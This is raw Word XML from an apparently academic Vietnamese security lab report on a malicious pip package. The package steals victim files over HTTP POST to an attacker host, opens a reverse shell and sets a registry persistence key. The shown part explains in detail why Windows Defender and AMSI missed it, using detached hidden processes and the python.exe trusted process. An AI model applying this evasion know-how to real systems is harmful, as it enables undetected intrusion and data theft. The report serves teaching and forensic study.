        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>--- secret.txt ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5A0DE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;nội dung file victim&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE934AC"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1C87117B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920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40" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="09968407" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Sự khác biệt về exfiltration so với phiên bản đầu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E53B657" w14:textId="255183B1" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>Phiên bản 1.0 cũ: collect_sensitive_data() chỉ copy file sang C:\Temp\Loot — vẫn trên máy victim (T1074 local staging). Attacker phải dùng reverse shell gõ thêm lệnh 'type C:\Temp\Loot\file.txt' mới đọc được. Phiên bản 1.</w:t>
            </w:r>
            <w:r w:rsidR="00031A18">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> mới: true_exfiltrate() đọc nội dung file và gửi HTTP POST về Ubuntu:8080 ngay lập tức — dữ liệu rời khỏi máy victim tự động (T1041 true exfiltration). Attacker không cần làm thêm gì.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04B6687D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D33DDA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc227470576"/>
      <w:r>
        <w:t>A.12 — Dấu vết cài đặt (IOC): pip-req-build trong AppData\Temp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="16F8C81D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi pip install, thư mục tạm pip-req-build-XXXX xuất hiện trong AppData\Local\Temp. Đây là artifact bình thường của pip trong quá trình build package. Trong bối cảnh điều tra (forensics), thư mục này là IOC quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121B3EF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Chứng minh thời điểm chính xác có package được tải và xử lý (timestamp của thư mục)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6500C8E4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu pip không dọn dẹp hết, có thể tìm lại mã nguồn setup.py và marker.py để phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A27B056" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Kết hợp với Registry key 'WindowsSysUpdater' và log network → đủ bức tranh đầy đủ về sự xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4C776" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F84A2C7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="5" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E658CE0" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc227470577"/>
      <w:r>
        <w:t>III. PHẦN B — BYPASS WINDOWS DEFENDER / AV (2.0 điểm)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="78DA4C62" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B131BA" w14:textId="007E2D0A" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả thực nghiệm: Sau khi pip install hoàn tất, cả reverse shell và C2 exfiltration đang chạy ngầm. Nhóm thực hiện Full Scan với Windows Defender — sau hơn 48 phút quét</w:t>
      </w:r>
      <w:r w:rsidR="002D1355">
        <w:t xml:space="preserve"> 809085</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files, Defender không phát hiện bất kỳ mối đe dọa nào. Đây là bằng chứng thực nghiệm trực tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD9C96" w14:textId="1A45B84A" w:rsidR="004D4D10" w:rsidRDefault="002D1355" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FBBB9CF" wp14:editId="64E50899">
            <wp:extent cx="5960110" cy="4659630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="190151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4820" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="4659630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662AEB7" w14:textId="77777777" w:rsidR="0062333B" w:rsidRDefault="0062333B" w:rsidP="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FD1589" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thông tin môi trường test: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4D4D10" w14:paraId="59CC4EA4"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7F3009F3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thành phần</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70FA9FAB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phiên bản</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="662CF62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F1DC99" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hệ điều hành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2A88618" w14:textId="55920672" w:rsidR="004D4D10" w:rsidRDefault="0062333B">
            <w:r w:rsidRPr="0062333B">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows 10 Enterprise LTSC Version 21H2 (OS Build 19044.7184)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="55A243A0"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65EBE8D1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows Defender</w:t>
            </w:r>
          </w:p>
        </w:tc>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264F920A" w14:textId="6DEE66C1" w:rsidR="004D4D10" w:rsidRDefault="0062333B">
            <w:r w:rsidRPr="0062333B">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Antimalware Client Version: 4.18.26030.3011</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="0F198E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D094198" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Intelligence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263058" w14:textId="392ADF16" w:rsidR="004D4D10" w:rsidRDefault="0062333B">
            <w:r w:rsidRPr="0062333B">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Antivirus Version: 1.449.166.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="2C31774F"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6287A7BC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ngày thực nghiệm</w:t>
            </w:r>
          </w:p>
        </w:tc>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093AB4A9" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15/04/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="7BEB8B9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BAE938" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scan type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D91C2D1" w14:textId="5CFD7F6F" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Full Scan —</w:t>
            </w:r>
            <w:r w:rsidR="002D1355">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">809085 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">files, 48 phút </w:t>
            </w:r>
            <w:r w:rsidR="002D1355">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> giây</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0261B995" w14:textId="77777777" w:rsidR="0062333B" w:rsidRDefault="0062333B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AD4C35" w14:textId="77777777" w:rsidR="0062333B" w:rsidRDefault="0062333B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F5A082" w14:textId="77777777" w:rsidR="0062333B" w:rsidRDefault="0062333B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E740DB5" w14:textId="1E2DC043" w:rsidR="0062333B" w:rsidRDefault="0062333B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0062333B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C358C6D" wp14:editId="3E39E266">
            <wp:extent cx="5960110" cy="2668270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17398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7109" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5960110" cy="2668270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62C22F" w14:textId="6A4C7BF0" w:rsidR="0062333B" w:rsidRDefault="0062333B">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="0062333B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ECA8071" wp14:editId="669BD548">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1169397</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3497883" cy="3208298"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="199833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32336" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3497883" cy="3208298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832482F" w14:textId="2B9BCD21" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc227470578"/>
      <w:r>
        <w:t xml:space="preserve">B.1 — </w:t>
      </w:r>
      <w:r w:rsidR="00FF4930" w:rsidRPr="00FF4930">
        <w:t>Phân tích tại sao payload tránh bị phát hiện (Evasion) — Từng lớp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="4C080FAF" w14:textId="7BF0D431" w:rsidR="004D4D10" w:rsidRDefault="00FF4930">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF4930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Cần lưu ý:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4930">
        <w:t xml:space="preserve"> Thực nghiệm cho thấy, với cấu hình mặc định trong môi trường hiện tại, payload đã thành công tránh bị phát hiện (evade) bởi quá trình Full Scan. Nguyên nhân chủ yếu là do đặc tính tự nhiên của hệ sinh thái Python chứ không phải do nhóm sử dụng các kỹ thuật obfuscation (làm rối mã nguồn) phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E99E4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Lý do 1: Trusted Process — Living off the Land (LotL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72C08F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Hãy hình dung Windows Defender như bảo vệ ở cổng công ty. Họ có danh sách đen những kẻ nguy hiểm và kiểm tra giấy tờ (chữ ký số) của mọi người vào cổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3351E3D3" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679DE021" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Payload không chạy dưới dạng malware.exe — một file lạ không ai biết. Nó ẩn bên trong python.exe — interpreter lập trình hợp pháp được cài bởi chính người dùng, thường xuyên thực hiện tác vụ mạng và hệ thống. Defender thấy python.exe mở kết nối → nghĩ 'lập trình viên đang làm việc' → không cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC40F5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2144D138" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Kỹ thuật này gọi là Living off the Land (LotL) — dùng công cụ hợp pháp của chính nạn nhân để tấn công. Đây là pattern phổ biến trong APT và supply chain malware thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B1F7E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73940FEB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Lý do 2: Không có file .exe độc lập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233A0D6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Defender giỏi phát hiện file .exe độc hại vì chúng có signature — hash hoặc byte pattern đặc trưng đã được ghi vào cơ sở dữ liệu. Payload được phân phối dưới dạng code Python thuần bên trong .tar.gz — không có signature nào để so khớp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ADEBF6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68421B60" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Việc pip install một thư viện là thao tác hàng ngày của developer. AV không thể chặn tất cả các lần cài pip mà không gây hàng ngàn false positive — nên buộc phải để qua.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B211800" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA2A7F1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Lý do 3: AMSI không trigger với subprocess.Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11B0A1" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Một câu hỏi quan trọng: tại sao AMSI (Antimalware Scan Interface — lớp scan động tích hợp trong Windows) không phát hiện?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1CF6D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6F789D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>AMSI hook vào các hàm thực thi script động: exec(), eval(), PowerShell Invoke-Expression, và các script engine. Payload của nhóm dùng subprocess.Popen() — đây là system call trực tiếp tới Win32 API CreateProcess(), không đi qua bất kỳ script engine nào mà AMSI giám sát. Do đó AMSI không có cơ hội scan nội dung lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E730E26" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF2D665" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Lý do 4: Detached Process — Tiến trình ẩn không có cửa sổ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6517ADA4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>setup.py spawn tiến trình Python thứ hai với hai flag đặc biệt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D5B52"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4D4D10" w14:paraId="15AF9C44"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76554475" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag Windows</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40303D62" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tác dụng thực tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="14EA43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0A9102" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DETACHED_PROCESS (0x00000008)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69A4F5" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tách khỏi console của pip cha — không bị tắt khi pip đóng, không gắn cửa sổ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="7BAE17B5"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7A376EBA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE_NO_WINDOW (0x08000000)</w:t>
            </w:r>
          </w:p>
        </w:tc>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3B9FC750" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Chạy hoàn toàn ẩn — không có cmd/terminal nào hiện trên màn hình</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="4FF0814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0D07E2D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>start_new_session=True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857544" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Session độc lập — tiến trình tồn tại riêng biệt trong hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="169EA18A"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589C56E2" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>daemon=False (threading)</w:t>
            </w:r>
          </w:p>
        </w:tc>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00BE10FE" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Thread không phải daemon → sống sót khi tiến trình pip cha kết thúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EA7E6A0" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
